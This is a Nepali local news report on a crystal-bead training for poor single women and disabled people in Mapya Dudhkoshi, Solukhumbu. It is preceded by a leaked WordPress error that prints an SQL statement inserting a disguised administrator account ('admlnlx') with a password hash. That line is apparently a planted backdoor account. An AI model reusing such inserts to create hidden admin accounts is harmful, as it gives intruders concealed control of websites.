WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BU9UoqeE9m4ppXd8uhNdsNEL3./aRt0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:09:26', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । माप्यदुधकोशी गाउँपालिकामा ५ दिने क्रिस्टल बनाउने तालिम सुरु भएको छ ।
माप्यदुधकोशी गाउँपालिकाको आयोजनामा सञ्चालित सिपमुलक क्रिस्टल बनाउने तालिमको शनिबार गाउँपालिका अध्यक्ष बुद्धिकिरण राईले उद्घाटन गरेका हो।
चुरा, पोते, माला बनाउन सिकाई महिलालाई आर्थिक स्तर विकास गराउन सहज होस भन्ने उद्देशले तालिम सुरु गरिएको गाउँपालिका उपाध्यक्ष जुनिता माया रेग्मी मगरले जानकारी दिए । तालिममा आर्थिक अवस्था कमजोर भएका एकल महिला र अपाङगता गरि १५ जनाको सहभागिता रहेको उपाध्यक्षले बताए । कच्चा पदार्थ लगायतका सामाग्री भने बाहिरबाट आयात गरिने छ ।